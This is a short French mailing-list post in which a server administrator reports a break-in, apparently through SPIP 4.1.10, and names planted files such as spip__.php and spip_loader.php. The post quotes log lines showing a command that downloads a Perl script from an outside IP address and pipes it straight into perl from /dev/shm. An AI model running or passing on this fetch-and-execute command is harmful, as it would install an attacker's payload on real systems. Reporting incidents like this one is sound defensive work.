Je ne l'aurais pas cru...
Le 27/06/2023 à 16:40, BERTRAND Joël a écrit :
BERTRAND Joël a écrit :
OK, je l'ai.
2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O -http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O -http://68.235.39.225/sepax|perl
J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
toujours pas qui le lance, mais on progresse.
Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP
antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se
font fait percer. Mais pas de la même manière. Le premier avait des
fichiers .php étranges dans sa racine : spip__.php et des choses comme
response.php. Le second avait un spip_loader.php qui embarquait un binaire.
